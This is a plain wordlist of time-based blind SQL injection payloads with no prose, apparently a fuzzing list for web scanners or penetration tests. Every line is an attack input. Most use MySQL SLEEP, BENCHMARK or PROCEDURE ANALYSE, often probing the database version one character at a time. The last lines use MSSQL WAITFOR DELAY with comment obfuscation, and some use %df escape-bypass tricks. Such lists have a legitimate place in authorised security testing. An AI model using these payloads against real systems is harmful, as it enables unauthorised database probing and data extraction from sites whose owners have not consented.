 PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(1=1,100000000),md5(1)))),1)--
" or 2=if((1=1 ) AND sleep(10),1,1) and ""="
1,7) or 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)=53),BENCHMARK(100000000,SHA1(1)),1))--
^if(now()=sysdate() and 1=1,SLEEP(10),0)
^if(now()=sysdate() and 1=1,BENCHMARK(100000000,SHA1(1)),0)
 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000000,SHA1(1)),1))))),1)
 AND 7621=IF((ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))=53),SLEEP(10),7621) and 1=1
' AND 7621=IF((ORD(MID((IFNULL(CAST(VERSION() AS CHAR),0x20)),1,1))=53),SLEEP(10),7621) and '1'='1
' (IF(MID(version(),1,1)=5, SLEEP(10), false)) '
 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)=53),sleep(10),1))-- a
 (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)=53),sleep(10),1))
' (IF(MID(version(),1,1)=5, SLEEP(10), false)) '
' AND SLEEP(10) AND 'buul' LIKE 'buul
 (IF(MID(version(),1,1)=5, SLEEP(10), false))
 if(now()=sysdate(),sleep(10),0)/^'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"^/
' or sleep(10) or '1'='1
 or sleep(10) -- a
 and sleep(10)
'/if(1,sleep(12),1)/'
 or sleep(10)
 and sleep(10) -- a
 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)=53),BENCHMARK(100000000,SHA1(1)),1))-- a
' (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)=53),BENCHMARK(100000000,SHA1(1)),1)) '
' AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)=53),BENCHMARK(100000000,SHA1(1)),1))-- a
' (SELECT 1 FROM (SELECT SLEEP(10))A) '
1,2) and exists(select if((1=1),sleep(10),1) and (1
^(sleep(10))
'XOR (if(1,sleep(10),0)) XOR'
%df' and sleep(10)--
aaa'XOR(if(now()%3dsysdate(),sleep(10),0))OR'bbb
%df' and sleep(10)#
%df' or sleep(10)#
 and benchmark(100000000,sha1(1))--
' or benchmark(100000000,sha1(5)) '
^1 and sleep(10)
^1 or sleep(10)
^1 or sleep(10)-- a
' or sleep(10) and '1'='1
 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000000,SHA1(1)),1))))),1)
%' and sleep(10) and '%'='
 PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(1=1,100000000),md5(1)))),1)--
' or 2=if((1=1 ) AND sleep(10),1,1) and ''='
1,7) or 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)=53),BENCHMARK(100000000,SHA1(1)),1))--
^if(1,SLEEP(10),0)
^if(true,SLEEP(10),0)
^if(1=1,SLEEP(10),0)
^if(1,BENCHMARK(100000000,SHA1(1)),0)
;(SELECT ^ FROM (SELECT(SLEEP(10)))kxhc)#
) or sleep(10)#
) and sleep(10)#
,if(1=1,sleep(10),1)
,if(true,sleep(10),1)
,if(1,sleep(10),1)
 case when (1=1) then sleep(10) else char(40) end
,case when (1=1) then sleep(10) else char(40) end
%df' xor sleep(10) and '1'='1
%df' xor sleep(10) xor '1'='1
^elt(sysdate()=now(),sleep(10))
';waitfor/**/delay/**/'0:0:10'--
'/**/waitfor/**/delay/**/'0:0:10'--
/**/waitfor/**/delay/**/'0:0:10'--
;waitfor/**/delay/**/'0:0:10'--
')/**/waitfor/**/delay/**/'0:0:10'--
'))/**/waitfor/**/delay/**/'0:0:10'--
)/**/waitfor/**/delay/**/'0:0:10'--
);waitfor/**/delay/**/'0:0:10'--
';waitfor/**/delay/**/'0:0:10'--
');waitfor/**/delay/**/'0:0:10'--